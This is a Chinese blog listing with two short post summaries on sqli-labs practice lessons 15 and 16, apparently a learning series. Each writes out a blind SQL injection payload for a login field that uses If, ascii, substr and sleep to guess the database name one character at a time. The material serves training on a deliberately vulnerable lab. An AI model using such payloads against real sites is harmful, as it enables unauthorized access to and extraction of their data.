摘要:
本题考点为双引号boolen/时间盲注 1.输入admin") and If(ascii(substr(database(),1,1))=115,1,sleep(5))#,密码任意。 原理和less15近似,使用了双引号 阅读全文
posted @ 2021-08-26 17:33
Nuyoah_QQ
阅读(40)
评论(0)
推荐(0)
摘要:
less 15的考点 单引号boolen/时间盲注 1.根据less8和less9的过程,username输入admin'and If(ascii(substr(database(),1,1))=115,1,sleep(5))# ,密码随便输入 这是可以发现页面立即返回成功登陆,这就说明猜测的数据库 阅读全文
posted @ 2021-08-26 17:31
Nuyoah_QQ
阅读(76)
评论(0)
推荐(0)
浙公网安备 33010602011771号